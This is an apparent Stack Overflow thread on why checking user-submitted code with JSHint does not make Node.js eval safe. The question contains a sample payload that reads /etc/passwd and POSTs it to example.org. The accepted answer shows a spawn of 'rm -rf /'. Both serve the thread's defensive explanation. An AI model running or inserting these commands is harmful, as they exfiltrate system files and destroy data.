# Is javascript eval still dangerous if code is checked using (for example) jshint before eval?

Tags: javascript, node.js, eval, jshint, javascript-injection

Imagine for example (authorized) users are allowed to submit custom formatters to a nodejs server that would have some code like this.

```
var JSHINT = require('jshint').JSHINT;

function formatterFactory(code) {
   // we could pass more options to jshint...
   JSHINT(code, {undef:true},['input','output']);
   if (JSHINT.data().errors) {
      // throw error...
      console.dir(JSHINT.errors);
      throw new Error(JSHINT.data().errors[0].reason);
   }
   // otherwhise eval
   return function(input) {
     var output;
     eval(code);
     return output;
   }
}

var userNastyCode = '                   \
  var http = require("http");           \
  var fs = require("fs");               \
  http.request({                        \
    method: "POST",                     \
    host: "example.org",                \
    path: "/muahaha"                    \
  }, function(res) {                    \
    res.resume();                       \
  }).end(fs.readFileSync("/etc/passwd"));';

var userFormatter = formatterFactory(userNastyCode);

userFormatter('some thing');

// throws error 'require' is not defined.
```

Comment: yep its still dangerous. jshint is only good for a code style check.

Comment: It seems to me that [`vm`](https://nodejs.org/api/vm.html) would be a better fit here.

Comment: @DanielA.White jshint complains about the smallest thing, could you expand on how it is still dangerous ?

Comment: @redben Infinite loops for starters. Access to local and global variables (including `require()`) ...

Comment: Your question demonstrates a lack of understand of what JSHint is for, and why use of `eval` can create security problems. The two things are completely unrelated. You cannot use JSHint to make user-supplied input safe to `eval`, and you do not need to worry about `eval` from a security stand-point unless you're letting one user `eval` *a different user's* input, *or* you're running user-entered code *sever-side*.

Comment: @mscdex Infinite loops...missed that one, but for require and the rest jshint would complain ("require is not defined")

Comment: @redben except that the user-supplied input could also include comments to suppress any and all JSHint warnings. JSHint has absolutely **nothing** to do with validating user input, and it cannot be used to do so.

Comment: @meagar "lack of understand" euh...

Comment: anyway... thanks. You could put your answers as "answers" :)

Comment: I don't understand why so many downvoters.  The OP doesn't quite understand what influences `eval()` safety (and thus they asked a question), but the question is clear and can easily be answered.  I see nothing wrong with the question.

Comment: I agree, it seems completely fine to me.

Comment: @redben It's still possible to get at such resources while still passing your jshint test.

Comment: @mscdex could you give an example please ?

Comment: @redben The most obvious way is to just use `require()` like [this](https://gist.github.com/anonymous/343c3f198f2b5dd001dc).

Comment: @mscdex hah but the code was incomplete :) (missing the jshint options like undef)

Answer (score 3, accepted):

User-provided text is never safe to `eval`, or at least should be considered never safe because the amount of effort you could put into proving safety far exceeds the amount of effort to accomplish what you want a different way.

JSHint looks at code syntax and (perhaps somewhat subjective) measures of quality, and malicious code is perfectly capable of satisfying those two things. For example, this is lovely code that may well do a lot of damage if you let me run it on your server:

```
require('child_process').spawn('rm', ['-rf', '/']);
```

JSHint doesn't complain about it, and if you have a custom configuration, I can either modify my code to pass, or as mentioned in the comments, just include my own configuration that quiets JSHint down. What you should remember is that if you let me hand you code to run, **I can do anything you can do**. It's a little harder than just giving me access to edit your files directly, but there's no real way for you to prevent me from doing something you don't want.

In this particular case, I'd think about a couple things:

- Do you really need the user to write totally arbitrary formatters? Maybe you can give them some known set of options to choose from instead.
- Do you know what the data to be formatted is (numbers, dates, etc.)? You can safely let them pick an arbitrary format to apply to the data type, like `yyyy-mm-dd`, without letting them pick their own JS, and there are lots of libraries you can pass the formatting strings to.
- Can you run their code in their browser? They can already run whatever JS they want in a developer console, so if you can set it up so their formatter runs in a similar context, you haven't opened any holes. (I've never tried this; it still feels dicey.)

Whatever you end up with, I'd keep JSHint's [`evil`](http://jshint.com/docs/options/#evil) option disabled on your own code :)

Comment: Finally an answer, thanks ! Actually formatter was just an example that is close enough (1 input 1 output). Never used eval myself but in my current project/feature it would really make things easy. I am doing some tests with jshint (as I asked) and disabling some other features (loop keywords as @mscdex said and function declaration). But I must admit it's starting to look like nuclear weapons against [Cockroaches](http://www.discovery.com/tv-shows/mythbusters/mythbusters-database/cockroaches-survive-nuclear-explosion/)
I think I'd better go for some kind of simple DSL.

Comment: DSL sounds like a pretty good idea. I usually think about this as something you want to whitelist vs blacklist. A `safe_eval` blacklist is nigh impossible, where a DSL implementing only what you need should be easy to reason about.